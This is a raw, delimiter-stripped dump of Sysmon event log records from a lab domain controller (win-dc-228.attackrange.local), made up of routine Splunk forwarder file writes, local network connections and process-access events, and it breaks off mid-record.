Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B28E4812D6FCA5D6E76433E2B72F66B4,SHA256=C51AC04EFF8D8B29FB10050284EBFD95D657235489A2639D222E68910F582111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200638Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:42.053{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0E6E99AE7F49C5B0FF0F33C8B159717,SHA256=A8F1B60033276203D390DC3992F99E020B08CBC82F83E619D8B678ED8FAF8F78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200641Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:43.303{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D015737087658D2E0321EAD70728818,SHA256=28F5C3CE3D718DBEC66AE9EE8AE81E4B1166FED8E979BBB62F700099F7AA604B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200640Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:43.303{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69E13BEC92CF210A2009E063DF1D65EE,SHA256=B1265C12F189258E0A4D2966259403348070D131A312CC93AB7F2BF42F85B5B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200639Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:43.085{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F1B40FA804E5561778430DB8E7EB632,SHA256=223F7DEAECBF27EC886A02853D8F84524D0B0E9F0D20A1D2D5FE3D6E9C5231EC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200643Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:40.078{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55146-false10.0.1.12-8000- 23542300x80000000000000002200642Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:44.131{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=15FBF82B72424613589504B2CEB671F5,SHA256=F6D32888E7D501CE4DE0F4CC3DEF2AFC16FC0E8574113E9FE34FA9D646D91B4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200644Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:45.163{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C04E90E7915F5EFDD7EFAF6E2E40A04,SHA256=78301FB2F8A37440988ACE5397EEE5CD48C8AFB7E1AC06B5E3B5813ED9FC9BB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200645Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:46.194{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A681FC64B8ED4C7BD1A212A409F955C,SHA256=172513B0EF0B2A434EFF7DA00E6D72170F49F7B71837ED06A668455A780A9B0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200646Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:47.225{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E39C5F318BF0C3FC9A70D5BDCE3FE060,SHA256=4BC107834E4FA6AE4C84D478715DB4A82FC5E73EE6F3439BD30D8073A112F4E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200649Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:48.381{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0560BDB22E255BAAE52CD69618AF931,SHA256=687EDB279FEF6639936CE7BB952BAEACCC6B541BB4255A6B34BB83D961E9F0F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200648Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:48.381{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D015737087658D2E0321EAD70728818,SHA256=28F5C3CE3D718DBEC66AE9EE8AE81E4B1166FED8E979BBB62F700099F7AA604B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200647Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:48.225{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E46F46A65E75B7985867749B82AF265,SHA256=5F298C9F60FDCC3D17345FE174607F33536CF92332A20CAC826398E2ABEE5C50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200652Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:49.413{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B096FF555739EE3C7BDB8B87880B63D0,SHA256=6E5C7FE6EC146C860E1B8B10372D62725386DCEFDB7EEC5FD57E49C539365D4A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200651Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:45.078{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55147-false10.0.1.12-8000- 23542300x80000000000000002200650Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:49.381{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A9421F4B26641F5D36006920788E047,SHA256=B832D766B1405D1B41569D9A71FFF6BD0FB3A4B6822EE0B95B82A2EC23941AEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200654Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:50.381{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D700DF942A590842318E3E631247CBD,SHA256=DE053215B881DCCB4EB1E367D8EC6C4AEFABE22D44BAA7357D7BFB725328B62B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200653Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:50.272{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D0560BDB22E255BAAE52CD69618AF931,SHA256=687EDB279FEF6639936CE7BB952BAEACCC6B541BB4255A6B34BB83D961E9F0F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200658Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:51.881{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B30076BF58FC3C8D2197D340EBAC7EA3,SHA256=642375A3EE506804A5EC22B58B2F3980018BDB70BFEA5BCF7C68450862231218,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200657Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:47.112{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58735- 354300x80000000000000002200656Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:47.111{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local64199- 23542300x80000000000000002200655Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:51.397{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A116E0C1674D435F908D11C3F606D24,SHA256=F8FFA2690EF97AA536617A110FEC0537922264E79922759BBBAB31B3275E9A23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200659Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:52.444{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5441A266BFF4EEB9DEC16A66204AB96F,SHA256=555E79C24D3DEDF4FBB53AB006FB5A962DEB45D33CC8CAB60472A45F5551DDFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200660Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:53.475{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=131954602EA31D3EDC23C876B911C86D,SHA256=BC14F584624CF6C17C7D6A5345FAD5EF65AA2997AB4A87E7D9C9E66ECDE62429,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200662Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:54.491{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37EED563521BAC9B1EE1AAFBD29A2B06,SHA256=2A63160A0312E36C6725A42FC6B8F21F81472969845397E901DE53DF9F45DE77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200661Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:54.053{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=23F8722EE9D4692C94CC1FAAA68AD83D,SHA256=CE9ADE97EA0D3E17ED099578C2611F0B49E1F9CE68BCF780F255CEF09519640A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200664Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:55.616{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5757B2C56D895CDCE1DA1BFBAFFE839C,SHA256=94EF04AD048D12036E58BD416E38F1640D2993BFA0AF54B7C82E6FA8208E9D4B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200663Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:50.860{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55148-false10.0.1.12-8000- 23542300x80000000000000002200665Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:56.850{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2C7C995D7F19B5220B6CF502DD49411,SHA256=6F882B7197C0AE9818D7DE1ECDB546D17E56FFDDD1CFAD8ABDA803EDD7159434,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200666Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:57.007{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=41B065BA23DF34F732AB6B17B1A9061E,SHA256=E85838042657B3282DBEA592F7EDC0A3125EA2947F32C1EEA0DCBF3F0CF5779E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200670Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:58.913{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A7CABA0C2F4B0639F42882494E8C8A88,SHA256=ECB80A3D41C005B2B93E18C1EE2399FD4EE63D10CC7FDF6182EA76DACA3C274F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200669Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:53.828{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55149-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000002200668Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:53.828{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local55149-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000002200667Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:58.007{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4DA1060A58510126F95239C94C40212,SHA256=5503F457FEF9140D85420B87A9642E71F6A93D5A1FB525C9176A7069105D9F9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200671Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:59.022{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF311CE48706746973AE5854500086A6,SHA256=3B2B2854C01D3B92DC3571E9675D07626A568615917D1210C0B87D7FC2D6478F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002200673Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:54:55.891{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55150-false10.0.1.12-8000- 23542300x80000000000000002200672Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:00.023{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A764604DD5456387F1DB5AAA835D79C1,SHA256=D68FEB0D3BD2BCF65AC5C73A36437495F9B7510A1E2EF9A94B1653CB82AA5D1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002200674Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:01.055{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08238AA6138022559270BA8B97BC4BBD,SHA256=82C4A8301A656898B506612E481E9AD1C1AC94422A5F49C11F5E74F8E3EBD2FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002200691Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.988{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6B6-6040-E74D-00000000AD01}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200690Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.988{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200689Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.988{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200688Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.988{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200687Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.988{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002200686Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.988{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E6B6-6040-E74D-00000000AD01}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002200685Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.988{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E6B6-6040-E74D-00000000AD01}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002200684Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.989{5ABCFE62-E6B6-6040-E74D-00000000AD01}6544C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002200683Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:55:02.317{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E6B6-6040-E64D-00000000AD01}7132C:\Program 